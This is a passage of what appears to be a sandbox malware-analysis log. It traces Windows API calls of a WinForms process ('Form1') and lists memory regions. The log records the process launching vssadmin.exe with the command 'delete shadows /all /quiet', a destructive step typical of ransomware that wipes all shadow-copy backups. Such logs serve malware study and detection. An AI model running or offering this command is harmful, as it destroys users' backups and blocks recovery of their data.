ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x14df00 | out: ppResult=0x14df00*=0x0) returned 11001 [0147.116] setsockopt (s=0x62c, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0147.116] closesocket (s=0x62c) returned 0 [0147.117] setsockopt (s=0x604, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0147.117] closesocket (s=0x604) returned 0 [0147.147] GetWindowThreadProcessId (in: hWnd=0x8036a, lpdwProcessId=0x14e680 | out: lpdwProcessId=0x14e680) returned 0xe7c [0147.147] GetCurrentThreadId () returned 0xe7c [0147.148] RegisterClipboardFormatW (lpszFormat="WindowsForms12_ThreadCallbackMessage") returned 0xc20c [0147.149] PostMessageW (hWnd=0x8036a, Msg=0xc20c, wParam=0x0, lParam=0x0) returned 1 [0147.151] GetWindowTextLengthW (hWnd=0x8036a) returned 5 [0147.151] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0147.151] GetSystemMetrics (nIndex=42) returned 0 [0147.151] GetWindowTextW (in: hWnd=0x8036a, lpString=0x14e590, nMaxCount=6 | out: lpString="Form1") returned 5 [0147.151] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0xd, wParam=0x6, lParam=0x14e590) returned 0x5 [0147.154] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x46, wParam=0x0, lParam=0x14edc0) returned 0x0 [0147.177] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x46, wParam=0x0, lParam=0x14edc0) returned 0x0 [0147.177] NtdllDefWindowProc_W (hWnd=0x401f6, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0147.177] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0147.178] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0147.185] OleInitialize (pvReserved=0x0) returned 0x0 [0147.186] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x14e978 | out: lplpMessageFilter=0x14e978*=0x0) returned 0x0 [0147.197] SetFocus (hWnd=0x8036a) returned 0x0 [0147.233] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x281, wParam=0x1, lParam=0xc000000f) returned 0x0 [0147.306] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0147.308] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x282, wParam=0x2, lParam=0x0) returned 0x0 [0147.311] GetParent (hWnd=0x8036a) returned 0x0 [0147.311] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0147.314] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0 [0147.314] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0147.316] GetWindowPlacement (in: hWnd=0x8036a, lpwndpl=0x14e988 | out: lpwndpl=0x14e988) returned 1 [0147.316] GetClientRect (in: hWnd=0x8036a, lpRect=0x14e8a0 | out: lpRect=0x14e8a0) returned 1 [0147.316] GetWindowTextLengthW (hWnd=0x8036a) returned 5 [0147.316] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0147.316] GetSystemMetrics (nIndex=42) returned 0 [0147.316] GetWindowTextW (in: hWnd=0x8036a, lpString=0x14e610, nMaxCount=6 | out: lpString="Form1") returned 5 [0147.316] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0xd, wParam=0x6, lParam=0x14e610) returned 0x5 [0147.316] GetClientRect (in: hWnd=0x8036a, lpRect=0x14e688 | out: lpRect=0x14e688) returned 1 [0147.328] GetSysColor (nIndex=10) returned 0xb4b4b4 [0147.328] GetSysColor (nIndex=2) returned 0xd1b499 [0147.328] GetSysColor (nIndex=9) returned 0x0 [0147.328] GetSysColor (nIndex=12) returned 0xababab [0147.328] GetSysColor (nIndex=15) returned 0xf0f0f0 [0147.328] GetSysColor (nIndex=20) returned 0xffffff [0147.329] GetSysColor (nIndex=16) returned 0xa0a0a0 [0147.329] GetSysColor (nIndex=15) returned 0xf0f0f0 [0147.329] GetSysColor (nIndex=16) returned 0xa0a0a0 [0147.329] GetSysColor (nIndex=21) returned 0x696969 [0147.329] GetSysColor (nIndex=22) returned 0xe3e3e3 [0147.329] GetSysColor (nIndex=20) returned 0xffffff [0147.329] GetSysColor (nIndex=18) returned 0x0 [0147.361] GetSysColor (nIndex=1) returned 0x0 [0147.361] GetSysColor (nIndex=27) returned 0xead1b9 [0147.361] GetSysColor (nIndex=28) returned 0xf2e4d7 [0147.361] GetSysColor (nIndex=17) returned 0x6d6d6d [0147.361] GetSysColor (nIndex=13) returned 0xff9933 [0147.361] GetSysColor (nIndex=14) returned 0xffffff [0147.362] GetSysColor (nIndex=26) returned 0xcc6600 [0147.362] GetSysColor (nIndex=11) returned 0xfcf7f4 [0147.362] GetSysColor (nIndex=3) returned 0xdbcdbf [0147.362] GetSysColor (nIndex=19) returned 0x0 [0147.362] GetSysColor (nIndex=24) returned 0xe1ffff [0147.362] GetSysColor (nIndex=23) returned 0x0 [0147.362] GetSysColor (nIndex=4) returned 0xf0f0f0 [0147.362] GetSysColor (nIndex=30) returned 0xf0f0f0 [0147.362] GetSysColor (nIndex=29) returned 0xff9933 [0147.362] GetSysColor (nIndex=7) returned 0x0 [0147.362] GetSysColor (nIndex=0) returned 0xc8c8c8 [0147.362] GetSysColor (nIndex=5) returned 0xffffff [0147.362] GetSysColor (nIndex=6) returned 0x646464 [0147.362] GetSysColor (nIndex=8) returned 0x0 [0147.364] GetSystemMetrics (nIndex=80) returned 1 [0147.370] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x1ac90a8c, dwData=0x0) returned 1 [0147.371] GetMonitorInfoW (in: hMonitor=0x10001, lpmi=0x14de80 | out: lpmi=0x14de80) returned 1 [0147.371] CreateDCW (pwszDriver="\\\\.\\DISPLAY1", pwszDevice=0x0, pszPort=0x0, pdm=0x0) returned 0x160109fc [0147.372] GetDeviceCaps (hdc=0x160109fc, index=12) returned 32 [0147.372] GetDeviceCaps (hdc=0x160109fc, index=14) returned 1 [0147.372] DeleteDC (hdc=0x160109fc) returned 1 [0147.374] GetCurrentObject (hdc=0x110106ca, type=0x1) returned 0x1b00017 [0147.374] GetCurrentObject (hdc=0x110106ca, type=0x2) returned 0x1900010 [0147.374] GetCurrentObject (hdc=0x110106ca, type=0x7) returned 0xffffffff910506af [0147.374] GetCurrentObject (hdc=0x110106ca, type=0x6) returned 0x18a0048 [0147.435] SaveDC (hdc=0x110106ca) returned 1 [0147.439] GetNearestColor (hdc=0x110106ca, color=0xf0f0f0) returned 0xf0f0f0 [0147.444] CreateSolidBrush (color=0xf0f0f0) returned 0x351009ca [0147.445] FillRect (hDC=0x110106ca, lprc=0x14e378, hbr=0x351009ca) returned 1 [0147.447] DeleteObject (ho=0x351009ca) returned 1 [0147.448] RestoreDC (hdc=0x110106ca, nSavedDC=-1) returned 1 [0147.455] GetWindowPlacement (in: hWnd=0x8036a, lpwndpl=0x14e968 | out: lpwndpl=0x14e968) returned 1 [0147.456] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x47, wParam=0x0, lParam=0x14edc0) returned 0x0 [0147.456] GetClientRect (in: hWnd=0x8036a, lpRect=0x14e800 | out: lpRect=0x14e800) returned 1 [0147.456] GetWindowRect (in: hWnd=0x8036a, lpRect=0x14e800 | out: lpRect=0x14e800) returned 1 [0147.457] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x5, wParam=0x0, lParam=0x105011c) returned 0x0 [0147.457] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x3, wParam=0x0, lParam=0xef00d8) returned 0x0 [0147.457] GetClientRect (in: hWnd=0x8036a, lpRect=0x14e890 | out: lpRect=0x14e890) returned 1 [0147.457] GetWindowRect (in: hWnd=0x8036a, lpRect=0x14e890 | out: lpRect=0x14e890) returned 1 [0147.458] PeekMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x14ef40) returned 1 [0147.458] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x7f, wParam=0x1, lParam=0x60) returned 0x170365 [0147.463] IsWindowUnicode (hWnd=0x8036a) returned 1 [0147.463] GetMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x14ef40) returned 1 [0147.470] TranslateMessage (lpMsg=0x14ef40) returned 0 [0147.471] DispatchMessageW (lpMsg=0x14ef40) returned 0x0 [0147.471] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0 [0147.471] PeekMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x14ef40) returned 1 [0147.471] IsWindowUnicode (hWnd=0x8036a) returned 1 [0147.471] GetMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x14ef40) returned 1 [0147.471] TranslateMessage (lpMsg=0x14ef40) returned 0 [0147.471] DispatchMessageW (lpMsg=0x14ef40) returned 0x0 [0147.473] PeekMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x14ef40) returned 1 [0147.474] IsWindowUnicode (hWnd=0x8036a) returned 1 [0147.474] GetMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x14ef40) returned 1 [0147.474] TranslateMessage (lpMsg=0x14ef40) returned 0 [0147.474] DispatchMessageW (lpMsg=0x14ef40) returned 0x0 [0147.475] BeginPaint (in: hWnd=0x8036a, lpPaint=0x14e648 | out: lpPaint=0x14e648) returned 0x110106ca [0147.476] GdipCreateHalftonePalette () returned 0x3e0807f4 [0147.486] SelectPalette (hdc=0x110106ca, hPal=0x3e0807f4, bForceBkgd=1) returned 0x188000b [0147.486] GetWindowTextLengthW (hWnd=0x8036a) returned 5 [0147.486] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0147.486] GetSystemMetrics (nIndex=42) returned 0 [0147.486] GetWindowTextW (in: hWnd=0x8036a, lpString=0x14e4f0, nMaxCount=6 | out: lpString="Form1") returned 5 [0147.486] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0xd, wParam=0x6, lParam=0x14e4f0) returned 0x5 [0147.486] SelectPalette (hdc=0x110106ca, hPal=0x188000b, bForceBkgd=0) returned 0x3e0807f4 [0147.486] EndPaint (hWnd=0x8036a, lpPaint=0x14e5e8) returned 1 [0147.486] PeekMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x14ef40) returned 0 [0147.487] PeekMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x14ef40) returned 0 [0147.487] WaitMessage () returned 1 [0147.620] PeekMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x14ef40) returned 1 [0147.620] IsWindowUnicode (hWnd=0x601fc) returned 1 [0147.621] GetMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x14ef40) returned 1 [0147.621] TranslateMessage (lpMsg=0x14ef40) returned 0 [0147.621] DispatchMessageW (lpMsg=0x14ef40) returned 0x0 [0147.621] PeekMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x14ef40) returned 0 [0147.621] PeekMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x14ef40) returned 0 [0147.621] WaitMessage () returned 1 [0255.015] PeekMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x14ef40) returned 1 [0255.022] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x84, wParam=0x0, lParam=0x11501b0) returned 0x1 [0255.023] IsWindowUnicode (hWnd=0x8036a) returned 1 [0255.023] GetMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x14ef40) returned 1 [0255.023] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x84, wParam=0x0, lParam=0x11501b0) returned 0x1 [0255.026] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0255.027] SetCursor (hCursor=0x10003) returned 0x10007 [0255.028] TranslateMessage (lpMsg=0x14ef40) returned 0 [0255.028] DispatchMessageW (lpMsg=0x14ef40) returned 0x0 [0255.042] _TrackMouseEvent (in: lpEventTrack=0x2151c58 | out: lpEventTrack=0x2151c58) returned 1 [0255.044] SendMessageW (hWnd=0x8036a, Msg=0xc1e7, wParam=0x0, lParam=0x0) returned 0x0 [0255.044] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0xc1e7, wParam=0x0, lParam=0x0) returned 0x0 [0255.046] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x200, wParam=0x0, lParam=0x2600d8) returned 0x0 [0255.046] GetKeyState (nVirtKey=1) returned 0 [0255.046] GetKeyState (nVirtKey=2) returned 0 [0255.046] GetKeyState (nVirtKey=4) returned 0 [0255.046] GetKeyState (nVirtKey=5) returned 0 [0255.046] GetKeyState (nVirtKey=6) returned 0 [0255.046] PeekMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x14ef40) returned 0 [0255.046] PeekMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x14ef40) returned 0 [0255.046] WaitMessage () returned 1 [0255.134] PeekMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x14ef40) returned 1 [0255.134] IsWindowUnicode (hWnd=0x8036a) returned 1 [0255.134] GetMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x14ef40) returned 1 [0255.134] TranslateMessage (lpMsg=0x14ef40) returned 0 [0255.134] DispatchMessageW (lpMsg=0x14ef40) returned 0x0 [0255.134] PeekMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x14ef40) returned 1 [0255.134] IsWindowUnicode (hWnd=0x8036a) returned 1 [0255.134] GetMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x14ef40) returned 1 [0255.134] TranslateMessage (lpMsg=0x14ef40) returned 0 [0255.134] DispatchMessageW (lpMsg=0x14ef40) returned 0x0 [0255.134] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x2a1, wParam=0x0, lParam=0x2600d8) returned 0x0 [0255.134] PeekMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x14ef40) returned 0 [0255.135] PeekMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x14ef40) returned 0 [0255.135] WaitMessage () returned 1 [0265.041] PeekMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x14ef40) returned 0 [0265.042] PeekMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x14ef40) returned 1 [0265.042] PeekMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x14ef40) returned 1 [0265.042] IsWindowUnicode (hWnd=0x8036a) returned 1 [0265.042] GetMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x14ef40) returned 1 [0265.042] TranslateMessage (lpMsg=0x14ef40) returned 0 [0265.042] DispatchMessageW (lpMsg=0x14ef40) returned 0x0 [0265.050] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x8036a, Msg=0x2a3, wParam=0x0, lParam=0x0) returned 0x0 [0265.051] PeekMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x14ef40) returned 0 [0265.051] PeekMessageW (in: lpMsg=0x14ef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x14ef40) returned 0 [0265.051] WaitMessage () Thread: id = 2 os_tid = 0xecc Thread: id = 3 os_tid = 0x590 Thread: id = 4 os_tid = 0x6a8 [0100.572] CoGetContextToken (in: pToken=0x1a65fa80 | out: pToken=0x1a65fa80) returned 0x800401f0 [0100.572] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0100.572] RoInitialize () returned 0x1 [0100.572] RoUninitialize () returned 0x0 Thread: id = 5 os_tid = 0xc80 Thread: id = 6 os_tid = 0x1018 Thread: id = 7 os_tid = 0x101c Thread: id = 8 os_tid = 0x1020 Thread: id = 9 os_tid = 0x1054 Thread: id = 10 os_tid = 0x1058 Thread: id = 180 os_tid = 0x2f4 Thread: id = 184 os_tid = 0x490 [0146.179] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0146.180] RoInitialize () returned 0x1 [0146.180] RoUninitialize () returned 0x0 [0146.183] ResetEvent (hEvent=0x4b0) returned 1 [0276.288] CoUninitialize () Process: id = "2" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x4aeb6000" os_pid = "0x106c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xe44" cmd_line = "\"C:\\Windows\\System32\\vssadmin.exe\" delete shadows /all /quiet" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 449 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 450 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 451 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 452 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 453 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 454 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 455 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 456 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 457 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 458 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 459 start_va = 0x7ff6ed990000 end_va = 0x7ff6ed9b7fff monitored = 0 entry_point = 0x7ff6ed9a3f60 region_type = mapped_file name = "vssadmin.exe" filename = "\\Windows\\System32\\vssadmin.exe" (normalized: "c:\\windows\\system32\\vssadmin.exe") Region: id = 460 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 461 start_va = 0x440000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 462 start_va = 0x7ff87ce40000 end_va = 0x7ff87d027fff monitored = 0 entry_point = 0x7ff87ce6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 463 start_va = 0x7ff87f640000 end_va = 0x7ff87f6ecfff monitored = 0 entry_point = 0x7ff87f6581a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 464 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 465 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 466 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1068 start_va = 0x7ff87fd30000 end_va = 0x7ff87fdd6fff monitored = 0 entry_point = 0x7ff87fd458d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1069 start_va = 0x7ff87fde0000 end_va = 0x7ff87fe7cfff monitored = 0 entry_point = 0x7ff87fde78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1070 start_va = 0x540000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1071 start_va = 0x7ff87f970000 end_va = 0x7ff87f9cafff monitored = 0 entry_point = 0x7ff87f9838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1072 start_va = 0x7ff87fe80000 end_va = 0x7ff87ff9bfff monitored = 0 entry_point = 0x7ff87fec02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1073 start_va = 0x7ff87ed60000 end_va = 0x7ff87eeb5fff monitored = 0 entry_point = 0x7ff87ed6a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1074 start_va = 0x7ff87f3e0000 end_va = 0x7ff87f565fff monitored = 0 entry_point = 0x7ff87f42ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1075 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1076 start_va = 0x7ff87fa80000 end_va = 0x7ff87fb40fff monitored = 0 entry_point = 0x7ff87faa0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1077 start_va = 0x7ff87f6f0000 end_va = 0x7ff87f96cfff monitored = 0 entry_point = 0x7ff87f7c4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1078 start_va = 0x7ff87d030000 end_va = 0x7ff87d099fff monitored = 0 entry_point = 0x7ff87d066d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1079 start_va = 0x7ff87fb50000 end_va = 0x7ff87fba1fff monitored = 0 entry_point = 0x7ff87fb5f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1095 start_va = 0x7ff86d220000 end_va = 0x7ff86d23dfff monitored = 0 entry_point = 0x7ff86d223a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1096 start_va = 0x7ff870690000 end_va = 0x7ff8706a7fff monitored = 0 entry_point = 0x7ff870692000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1097 start_va = 0x7ff8706b0000 end_va = 0x7ff870831fff monitored = 0 entry_point = 0x7ff8706c82a0 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1098 start_va = 0x7ff87eed0000 end_va = 0x7ff87ef3afff monitored = 0 entry_point = 0x7ff87eee90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1099 start_va = 0x5c0000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1100 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1101 start_va = 0x400000 end_va = 0x438fff monitored = 0 entry_point = 0x4012f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1102 start_va = 0x610000 end_va = 0x797fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 1103 start_va = 0x7ff87d4f0000 end_va = 0x7ff87d52afff monitored = 0 entry_point = 0x7ff87d4f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1104 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1105 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1106 start_va = 0x1f0000 end_va = 0x1fcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vssadmin.exe.mui" filename = "\\Windows\\System32\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\vssadmin.exe.mui") Region: id = 1107 start_va = 0x7a0000 end_va = 0x920fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 